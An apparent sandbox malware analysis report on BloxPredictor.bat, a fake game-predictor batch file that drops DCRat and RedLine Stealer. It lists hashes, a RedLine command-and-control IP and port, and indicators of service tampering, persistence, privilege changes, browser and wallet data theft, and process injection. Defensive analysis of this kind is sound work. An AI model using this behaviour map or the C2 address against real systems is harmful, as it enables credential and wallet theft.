dcrat | 001c531b29372d4f6c7697ac00a575773470d23c8681d1d5930aa1e4cd860b76

Analysis

max time kernel
132s
max time network
133s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
03-09-2022 03:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BloxPredictor.bat
Size

24KB
MD5

2ce736935920d83e5d55570739ca8c17
SHA1

9aab2f25403a0fe6921c152f61ed3d2ceacfad49
SHA256

001c531b29372d4f6c7697ac00a575773470d23c8681d1d5930aa1e4cd860b76
SHA512

c58589dbcf5a23ca2cd9284733db20659b81850a33bc6eddf6379507fb7307a569019373168665fee93c02d42bdd3ee3c42377db7e16405e32f6e7554d8a3de0
SSDEEP

768:lsh2CrG0Qz6Ee7Z+x4a7eE8xRrQAh+WVqMJzO:BCrGrGE7x4a7eDfrQAh+SJzO

Score

10^/10

dcrat redline dv discovery evasion exploit infostealer rat spyware stealer

Malware Config

Extracted

Family

redline

Botnet

195.3.223.79:65252

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2896	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3808	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2080	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1672	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4184	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3708	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3868	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4392	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2828	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3804	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4156	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4564	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	432	4816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1400	4816	schtasks.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\LicenceOutput.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\LicenceOutput.exe	family_redline
behavioral2/memory/2304-163-0x0000000000B80000-0x0000000000B9E000-memory.dmp	family_redline

DCRat payload 8 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\protection1.exe	dcrat
C:\Users\Admin\AppData\Roaming\protection1.exe	dcrat
C:\containerServerWebMonitornet\ContainerServersvc.exe	dcrat
C:\containerServerWebMonitornet\ContainerServersvc.exe	dcrat
behavioral2/memory/4020-179-0x0000000000760000-0x0000000000A4C000-memory.dmp	dcrat
C:\Program Files\Reference Assemblies\StartMenuExperienceHost.exe	dcrat
behavioral2/memory/2828-262-0x0000000000C40000-0x0000000000F2C000-memory.dmp	dcrat
C:\Program Files\Reference Assemblies\StartMenuExperienceHost.exe	dcrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

17 2736 powershell.exe
Downloads MZ/PE file

flow	pid	process
17	2736	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

LicenceChecker.exeupdaterchr.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	LicenceChecker.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updaterchr.exe

Executes dropped EXE 8 IoCs

Processes:

BloxPredictor.bat.exeprotection1.exeLicenceChecker.exeLicenceOutput.exeContainerServersvc.exeupdaterchr.exeStartMenuExperienceHost.exeexplorer.exe

pid	process
3836	BloxPredictor.bat.exe
4188	protection1.exe
2344	LicenceChecker.exe
2304	LicenceOutput.exe
4020	ContainerServersvc.exe
1408	updaterchr.exe
2828	StartMenuExperienceHost.exe
4724	explorer.exe

Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exetakeown.exe

pid process

4220 takeown.exe
3572 icacls.exe
3784 icacls.exe
3864 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4220	takeown.exe
3572	icacls.exe
3784	icacls.exe
3864	takeown.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

LicenceChecker.exeprotection1.exeWScript.exeContainerServersvc.exeStartMenuExperienceHost.exeBloxPredictor.bat.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	LicenceChecker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	protection1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	ContainerServersvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	StartMenuExperienceHost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	BloxPredictor.bat.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exetakeown.exe

pid process

3572 icacls.exe
3784 icacls.exe
3864 takeown.exe
4220 takeown.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

55 ipinfo.io
56 ipinfo.io

pid	process
3572	icacls.exe
3784	icacls.exe
3864	takeown.exe
4220	takeown.exe

flow	ioc
55	ipinfo.io
56	ipinfo.io

Drops file in System32 directory 5 IoCs

Processes:

updaterchr.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\4EDB.tmp	updaterchr.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updaterchr.exe.log	updaterchr.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

updaterchr.exe

description pid process target process

PID 1408 set thread context of 4724 1408 updaterchr.exe explorer.exe

description	pid	process	target process
PID 1408 set thread context of 4724	1408	updaterchr.exe	explorer.exe

Drops file in Program Files directory 13 IoCs

Processes:

ContainerServersvc.exeLicenceChecker.exeupdaterchr.exe

description	ioc	process
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\spoolsv.exe	ContainerServersvc.exe
File created	C:\Program Files\Reference Assemblies\StartMenuExperienceHost.exe	ContainerServersvc.exe
File created	C:\Program Files\Google\Chrome\updaterchr.exe	LicenceChecker.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\RCXBDFB.tmp	ContainerServersvc.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updaterchr.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\f3b6ecef712a24	ContainerServersvc.exe
File created	C:\Program Files\Reference Assemblies\55b276f4edf653	ContainerServersvc.exe
File opened for modification	C:\Program Files\Google\Chrome\updaterchr.exe	LicenceChecker.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\RCXBD7D.tmp	ContainerServersvc.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\spoolsv.exe	ContainerServersvc.exe
File opened for modification	C:\Program Files\Reference Assemblies\RCXC0CA.tmp	ContainerServersvc.exe
File opened for modification	C:\Program Files\Reference Assemblies\RCXC177.tmp	ContainerServersvc.exe
File opened for modification	C:\Program Files\Reference Assemblies\StartMenuExperienceHost.exe	ContainerServersvc.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3548 sc.exe
1892 sc.exe
5156 sc.exe
748 sc.exe
5328 sc.exe
4716 sc.exe
3784 sc.exe
1504 sc.exe
2568 sc.exe
5044 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
3548	sc.exe
1892	sc.exe
5156	sc.exe
748	sc.exe
5328	sc.exe
4716	sc.exe
3784	sc.exe
1504	sc.exe
2568	sc.exe
5044	sc.exe

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
228	schtasks.exe
2828	schtasks.exe
432	schtasks.exe
3808	schtasks.exe
2080	schtasks.exe
1672	schtasks.exe
4392	schtasks.exe
3804	schtasks.exe
2896	schtasks.exe
3708	schtasks.exe
3868	schtasks.exe
4156	schtasks.exe
1400	schtasks.exe
4184	schtasks.exe
4564	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

updaterchr.exepowershell.exepowershell.exeexplorer.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updaterchr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe

Modifies registry class 3 IoCs

Processes:

protection1.exeContainerServersvc.exeStartMenuExperienceHost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	protection1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	ContainerServersvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	StartMenuExperienceHost.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
3508	reg.exe
2368	reg.exe
5180	reg.exe
736	reg.exe
1056	reg.exe
2836	reg.exe
3496	reg.exe
3060	reg.exe
4696	reg.exe
3136	reg.exe
5228	reg.exe
2856	reg.exe
556	reg.exe
4780	reg.exe
5364	reg.exe
100	reg.exe
3724	reg.exe
4140	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

BloxPredictor.bat.exepowershell.exepowershell.exepowershell.exepowershell.exeContainerServersvc.exeLicenceChecker.exepowershell.exeLicenceOutput.exepowershell.exeicacls.exebackgroundTaskHost.exepowershell.exe

pid	process
3836	BloxPredictor.bat.exe
3836	BloxPredictor.bat.exe
2736	powershell.exe
2736	powershell.exe
1256	powershell.exe
1256	powershell.exe
3388	powershell.exe
3388	powershell.exe
4884	powershell.exe
4884	powershell.exe
4884	powershell.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
2344	LicenceChecker.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4712	powershell.exe
4712	powershell.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
2304	LicenceOutput.exe
4020	ContainerServersvc.exe
2760	powershell.exe
2760	powershell.exe
4020	ContainerServersvc.exe
4020	ContainerServersvc.exe
3784	icacls.exe
3784	icacls.exe
4328	backgroundTaskHost.exe
4328	backgroundTaskHost.exe
2304	LicenceOutput.exe
2304	LicenceOutput.exe
4020	ContainerServersvc.exe
2816	powershell.exe
2816	powershell.exe
4020	ContainerServersvc.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

StartMenuExperienceHost.exe

pid process

2828 StartMenuExperienceHost.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

660

pid	process
2828	StartMenuExperienceHost.exe

pid	process
660

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

BloxPredictor.bat.exepowershell.exepowershell.exepowershell.exeLicenceOutput.exeContainerServersvc.exepowercfg.exepowershell.exepowercfg.exepowercfg.exeschtasks.exe

description	pid	process
Token: SeDebugPrivilege	3836	BloxPredictor.bat.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	1256	powershell.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	2304	LicenceOutput.exe
Token: SeDebugPrivilege	4020	ContainerServersvc.exe
Token: SeShutdownPrivilege	316	powercfg.exe
Token: SeCreatePagefilePrivilege	316	powercfg.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeShutdownPrivilege	1104	powercfg.exe
Token: SeCreatePagefilePrivilege	1104	powercfg.exe
Token: SeShutdownPrivilege	1532	powercfg.exe
Token: SeCreatePagefilePrivilege	1532	powercfg.exe
Token: SeShutdownPrivilege	3372	schtasks.exe
Token: SeCreatePagefilePrivilege	3372	schtasks.exe
Token: SeIncreaseQuotaPrivilege	4884	powershell.exe
Token: SeSecurityPrivilege	4884	powershell.exe
Token: SeTakeOwnershipPrivilege	4884	powershell.exe
Token: SeLoadDriverPrivilege	4884	powershell.exe
Token: SeSystemProfilePrivilege	4884	powershell.exe
Token: SeSystemtimePrivilege	4884	powershell.exe
Token: SeProfSingleProcessPrivilege	4884	powershell.exe
Token: SeIncBasePriorityPrivilege	4884	powershell.exe
Token: SeCreatePagefilePrivilege	4884	powershell.exe
Token: SeBackupPrivilege	4884	powershell.exe
Token: SeRestorePrivilege	4884	powershell.exe
Token: SeShutdownPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeSystemEnvironmentPrivilege	4884	powershell.exe
Token: SeRemoteShutdownPrivilege	4884	powershell.exe
Token: SeUndockPrivilege	4884	powershell.exe
Token: SeManageVolumePrivilege	4884	powershell.exe
Token: 33	4884	powershell.exe
Token: 34	4884	powershell.exe
Token: 35	4884	powershell.exe
Token: 36	4884	powershell.exe
Token: SeIncreaseQuotaPrivilege	4884	powershell.exe
Token: SeSecurityPrivilege	4884	powershell.exe
Token: SeTakeOwnershipPrivilege	4884	powershell.exe
Token: SeLoadDriverPrivilege	4884	powershell.exe
Token: SeSystemProfilePrivilege	4884	powershell.exe
Token: SeSystemtimePrivilege	4884	powershell.exe
Token: SeProfSingleProcessPrivilege	4884	powershell.exe
Token: SeIncBasePriorityPrivilege	4884	powershell.exe
Token: SeCreatePagefilePrivilege	4884	powershell.exe
Token: SeBackupPrivilege	4884	powershell.exe
Token: SeRestorePrivilege	4884	powershell.exe
Token: SeShutdownPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeSystemEnvironmentPrivilege	4884	powershell.exe
Token: SeRemoteShutdownPrivilege	4884	powershell.exe
Token: SeUndockPrivilege	4884	powershell.exe
Token: SeManageVolumePrivilege	4884	powershell.exe
Token: 33	4884	powershell.exe
Token: 34	4884	powershell.exe
Token: 35	4884	powershell.exe
Token: 36	4884	powershell.exe
Token: SeIncreaseQuotaPrivilege	4884	powershell.exe
Token: SeSecurityPrivilege	4884	powershell.exe
Token: SeTakeOwnershipPrivilege	4884	powershell.exe
Token: SeLoadDriverPrivilege	4884	powershell.exe
Token: SeSystemProfilePrivilege	4884	powershell.exe
Token: SeSystemtimePrivilege	4884	powershell.exe
Token: SeProfSingleProcessPrivilege	4884	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

StartMenuExperienceHost.exe

pid process

2828 StartMenuExperienceHost.exe

pid	process
2828	StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exeBloxPredictor.bat.execmd.exepowershell.exeLicenceChecker.exeprotection1.exeWScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2740 wrote to memory of 4932	2740	cmd.exe	net.exe
PID 2740 wrote to memory of 4932	2740	cmd.exe	net.exe
PID 4932 wrote to memory of 4940	4932	net.exe	net1.exe
PID 4932 wrote to memory of 4940	4932	net.exe	net1.exe
PID 2740 wrote to memory of 3836	2740	cmd.exe	BloxPredictor.bat.exe
PID 2740 wrote to memory of 3836	2740	cmd.exe	BloxPredictor.bat.exe
PID 3836 wrote to memory of 2736	3836	BloxPredictor.bat.exe	powershell.exe
PID 3836 wrote to memory of 2736	3836	BloxPredictor.bat.exe	powershell.exe
PID 3836 wrote to memory of 5072	3836	BloxPredictor.bat.exe	cmd.exe
PID 3836 wrote to memory of 5072	3836	BloxPredictor.bat.exe	cmd.exe
PID 5072 wrote to memory of 116	5072	cmd.exe	choice.exe
PID 5072 wrote to memory of 116	5072	cmd.exe	choice.exe
PID 2736 wrote to memory of 1256	2736	powershell.exe	powershell.exe
PID 2736 wrote to memory of 1256	2736	powershell.exe	powershell.exe
PID 5072 wrote to memory of 2484	5072	cmd.exe	attrib.exe
PID 5072 wrote to memory of 2484	5072	cmd.exe	attrib.exe
PID 2736 wrote to memory of 4188	2736	powershell.exe	protection1.exe
PID 2736 wrote to memory of 4188	2736	powershell.exe	protection1.exe
PID 2736 wrote to memory of 4188	2736	powershell.exe	protection1.exe
PID 2736 wrote to memory of 2344	2736	powershell.exe	LicenceChecker.exe
PID 2736 wrote to memory of 2344	2736	powershell.exe	LicenceChecker.exe
PID 2736 wrote to memory of 2304	2736	powershell.exe	LicenceOutput.exe
PID 2736 wrote to memory of 2304	2736	powershell.exe	LicenceOutput.exe
PID 2736 wrote to memory of 2304	2736	powershell.exe	LicenceOutput.exe
PID 2344 wrote to memory of 3388	2344	LicenceChecker.exe	powershell.exe
PID 2344 wrote to memory of 3388	2344	LicenceChecker.exe	powershell.exe
PID 4188 wrote to memory of 2704	4188	protection1.exe	WScript.exe
PID 4188 wrote to memory of 2704	4188	protection1.exe	WScript.exe
PID 4188 wrote to memory of 2704	4188	protection1.exe	WScript.exe
PID 2704 wrote to memory of 4344	2704	WScript.exe	cmd.exe
PID 2704 wrote to memory of 4344	2704	WScript.exe	cmd.exe
PID 2704 wrote to memory of 4344	2704	WScript.exe	cmd.exe
PID 4344 wrote to memory of 4020	4344	cmd.exe	ContainerServersvc.exe
PID 4344 wrote to memory of 4020	4344	cmd.exe	ContainerServersvc.exe
PID 2344 wrote to memory of 748	2344	LicenceChecker.exe	cmd.exe
